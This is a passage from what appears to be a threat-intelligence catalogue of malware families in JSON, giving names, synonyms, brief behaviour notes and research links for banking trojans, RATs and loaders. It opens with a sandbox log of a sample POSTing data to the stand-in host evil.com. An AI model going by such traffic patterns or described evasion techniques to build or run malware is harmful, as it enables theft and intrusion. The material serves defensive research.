Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
- "meta": {
- "synonyms": [
- "BokBot"
- ],
- "type": [],
- "refs": [
- "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
- "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
- "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
- "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid"
- ]
- }
- },
- {
- "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2",
- "value": "TreasureHunter",
- "description": "",
- "meta": {
- "synonyms": [
- "huntpos"
- ],
- "type": [],
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html",
- "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/",
- "http://adelmas.com/blog/treasurehunter.php"
- ]
- }
- },
- {
- "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b",
- "value": "AlmaLocker",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "da032a95-b02a-4af2-b563-69f686653af4",
- "value": "Ratty",
- "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://github.com/shotskeber/Ratty"
- ]
- }
- },
- {
- "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9",
- "value": "Terminator RAT",
- "description": "",
- "meta": {
- "synonyms": [
- "Fakem RAT"
- ],
- "type": [],
- "refs": [
- "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf",
- "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html",
- "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf",
- "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf"
- ]
- }
- },
- {
- "uuid": "93b1c63a-4a34-44fd-805b-0a3470ff7e6a",
- "value": "Connic",
- "description": "",
- "meta": {
- "synonyms": [
- "SpyBanker"
- ],
- "type": [],
- "refs": [
- "https://www.welivesecurity.com/2017/12/11/banking-malware-targets-polish-banks/"
- ]
- }
- },
- {
- "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8",
- "value": "Mikoponi",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": []
- }
- },
- {
- "uuid": "80d7d229-b3a7-4205-8304-f7b18bda129f",
- "value": "FlexNet",
- "description": "",
- "meta": {
- "synonyms": [
- "gugi"
- ],
- "type": [],
- "refs": [
- "https://twitter.com/LukasStefanko/status/886849558143279104"
- ]
- }
- },
- {
- "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01",
- "value": "Elise",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf",
- "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
- "https://securelist.com/blog/research/70726/the-spring-dragon-apt/",
- "https://www.joesecurity.org/blog/8409877569366580427"
- ]
- }
- },
- {
- "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b",
- "value": "Heriplor",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
- ]
- }
- },
- {
- "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32",
- "value": "XRat",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://blog.lookout.com/xrat-mobile-threat"
- ]
- }
- },
- {
- "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b",
- "value": "Roseam",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/"
- ]
- }
- },
- {
- "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78",
- "value": "August Stealer",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene",
- "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html"
- ]
- }
- },
- {
- "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e",
- "value": "PvzOut",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"
- ]
- }
- },
- {
- "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9",
- "value": "Cutlet",
- "description": "",
- "meta": {
- "synonyms": [],
- "type": [],
- "refs": [
- "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html"
- ]
- }
- },
- {
- "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41",
- 
"value": "Qarallax RAT", - "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/", - "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/" - ] - } - }, - { - "uuid": "2f11eb73-4faa-48c5-b217-11e139962c6f", - "value": "Boaxxe", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/" - ] - } - }, - { - "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", - "value": "shareip", - "description": "", - "meta": { - "synonyms": [ - "remotecmd" - ], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" - ] - } - }, - { - "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", - "value": "Virut", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", - "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/" - ] - } - }, - { - "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", - "value": "KopiLuwak", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", - 
"https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/" - ] - } - }, - { - "uuid": "9240ce4f-2c48-4e37-baaf-b8b9050c58f5", - "value": "Bahamut", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", - "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" - ] - } - }, - { - "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", - "value": "Aveo", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" - ] - } - }, - { - "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", - "value": "Fobber", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", - "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", - "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", - "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", - "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" - ] - } - }, - { - "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", - "value": "Powersniff", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://lokalhost.pl/gozi_tree.txt" - ] - } - }, - { - "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", - "value": "Nemim", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" - ] - } - }, - { - "uuid": "d99c0a47-9d61-4d92-86ec-86a87b060d76", - "value": "Svpeng", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ 
- "https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/" - ] - } - }, - { - "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", - "value": "NanoLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "f9f37707-36cf-4ad0-88e0-86f47cbe0ed6", - "value": "WebC2-Head", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", - "value": "Keydnap", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html", - "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", - "https://github.com/eset/malware-ioc/tree/master/keydnap" - ] - } - }, - { - "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", - "value": "Saphyra", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", - "https://www.youtube.com/watch?v=Bk-utzAlYFI" - ] - } - }, - { - "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", - "value": "Geodo", - "description": "", - "meta": { - "synonyms": [ - "Emotet", - "Heodo" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://feodotracker.abuse.ch/?filter=version_e", - "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", - 
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", - "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" - ] - } - }, - { - "uuid": "9fbb5822-1660-4651-9f57-b6f83a881786", - "value": "GovRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.yumpu.com/en/document/view/55930175/govrat-v20" - ] - } - }, - { - "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", - "value": "Molerat Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/iec/", - "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" - ] - } - }, - { - "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", - "value": "Snifula", - "description": "", - "meta": { - "synonyms": [ - "Ursnif" - ], - "type": [], - "refs": [ - "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf" - ] - } - }, - { - "uuid": "42e23d17-8f1b-43c9-bc76-e3cf098b5c52", - "value": "woody", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814" - ] - } - }, - { - "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", - "value": "Hi-Zor RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" - ] - } - }, - { - "uuid": "94466a80-964f-467e-b4b3-0e1375174464", - "value": "Hworm", - "description": "", - "meta": { - "synonyms": [ - "houdini" - ], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" - ] - } - }, - { - "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", - 
"value": "Anel", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/" - ] - } - }, - { - "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", - "value": "Crimson", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" - ] - } - }, - { - "uuid": "37f4fe10-96e4-4b3e-9159-80023270d3a6", - "value": "Retefe", - "description": "The Android app using for Retefe is a SMS stealer, used to forward mTAN codes to the threat actor. Further is a bank logo added to the specific Android app to trick users into thinking this is a legitimate app. Moreover, if the victim is not a real victim, the link to download the APK is not the malicious APK, but the real 'Signal Private Messenger' tool, hence the victim's phone doesn't get infected.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.angelalonso.es/2015/10/reversing-c2c-http-emmental.html", - "https://www.govcert.admin.ch/blog/33/the-retefe-saga", - "http://blog.angelalonso.es/2017/02/hunting-retefe-with-splunk-some24.html", - "http://maldr0id.blogspot.ch/2014/09/android-malware-based-on-sms-encryption.html", - "http://blog.angelalonso.es/2015/11/reversing-sms-c-protocol-of-emmental.html", - "http://blog.dornea.nu/2014/07/07/disect-android-apks-like-a-pro-static-code-analysis/" - ] - } - }, - { - "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", - "value": "FlashBack", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", - "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" - ] - } - }, - { - "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", - "value": "FakeTC", - 
"description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" - ] - } - }, - { - "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", - "value": "Matsnu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" - ] - } - }, - { - "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", - "value": "Sierra(Alfa,Bravo, ...)", - "description": "", - "meta": { - "synonyms": [ - "Destover" - ], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" - ] - } - }, - { - "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", - "value": "IISniff", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" - ] - } - }, - { - "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", - "value": "Stuxnet", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" - ] - } - }, - { - "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", - "value": "Tinba", - "description": "", - "meta": { - "synonyms": [ - "Zusy", - "Illi", - "TinyBanker" - ], - "type": [], - "refs": [ - "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", - "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", - "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", - "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", - "http://contagiodump.blogspot.com/2012/06/amazon.html", - 
"http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", - "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", - "http://garage4hackers.com/entry.php?b=3086", - "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", - "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/" - ] - } - }, - { - "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", - "value": "GrabBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" - ] - } - }, - { - "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", - "value": "Duuzer", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - } - }, - { - "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", - "value": "MyloBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" - ] - } - }, - { - "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", - "value": "Eye Pyramid", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintel.com/2017/01/Eye-Pyramid.html", - "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/" - ] - } - }, - { - "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", - "value": "DarkPulsar", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" - ] - } - }, - { - "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", - "value": "GalaxyLoader", - "description": "GalaxyLoader is a simple .NET loader. 
Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", - "value": "StarsyPound", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", - "value": "Moure", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", - "value": "MacDownloader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://iranthreats.github.io/resources/macdownloader-macos-malware/" - ] - } - }, - { - "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", - "value": "ISR Stealer", - "description": "ISR Stealer is a modified version of the Hackhound Stealer. 
It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" - ] - } - }, - { - "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", - "value": "DoublePulsar", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", - "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", - "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", - "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" - ] - } - }, - { - "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a", - "value": "BBSRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/" - ] - } - }, - { - "uuid": "fca8c5e0-4fef-408c-bcd7-9826271e8e5d", - "value": "CenterPOS", - "description": "", - "meta": { - "synonyms": [ - "cerebrus" - ], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html" - ] - } - }, - { - "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", - "value": "Thanatos", - "description": "", - "meta": { - "synonyms": [ - "Alphabot" - ], - "type": [], - "refs": [ - "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" - ] - } - }, - { - "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", - "value": "DtBackdoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": 
"eaf0afc1-de01-450f-86a1-12a93a3db256", - "value": "FlexiSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] - } - }, - { - "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", - "value": "SNS Locker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5350bf3a-26b0-49fb-a0b8-dd68933ea78c", - "value": "WebC2-Rave", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf" - ] - } - }, - { - "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", - "value": "OddJob", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", - "value": "GROK", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] - } - }, - { - "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", - "value": "NETEAGLE", - "description": "", - "meta": { - "synonyms": [ - "ScoutEagle" - ], - "type": [], - "refs": [ - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", - "value": "Enfal", - "description": "", - "meta": { - "synonyms": [ - "Lurid" - ], - "type": [], - "refs": [ - "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", - "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", - "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" - ] - } - }, - { - "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", - "value": "Sys10", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", - 
"https://securelist.com/analysis/publications/69953/the-naikon-apt/", - "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" - ] - } - }, - { - "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", - "value": "Synth Loader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", - "value": "MoonWind", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" - ] - } - }, - { - "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", - "value": "Schneiken", - "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", - "https://github.com/vithakur/schneiken" - ] - } - }, - { - "uuid": "fe6134aa-6588-4619-8447-57a44eb8b24c", - "value": "Lazarus ELF Backdoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-appears-linked-to-lazarus-cybercrime-group/#sf174581990" - ] - } - }, - { - "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", - "value": "Neuron", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.ncsc.gov.uk/alerts/turla-group-malware" - ] - } - }, - { - "uuid": "7078d273-8a2d-477a-b6d9-7313e22d9ad7", - "value": "ZoxPNG", - "description": "", - "meta": { - "synonyms": [ - "gresim" - ], - "type": [], - "refs": [ - "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf" - ] - } - }, - { - "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", - "value": "Arik Keylogger", - "description": "", - "meta": { - "synonyms": [ - "Aaron Keylogger" - ], - "type": [], - "refs": [ - 
"http://remote-keylogger.net/", - "https://www.invincea.com/2016/09/crimeware-as-a-service-goes-mainstream/" - ] - } - }, - { - "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc", - "value": "Bitsran", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html" - ] - } - }, - { - "uuid": "fa3d196b-b757-49b7-a06d-77c77ac151c4", - "value": "WebMonitor RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" - ] - } - }, - { - "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", - "value": "ISMDoor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.clearskysec.com/greenbug/", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" - ] - } - }, - { - "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777", - "value": "Retefe", - "description": "Retefe is a 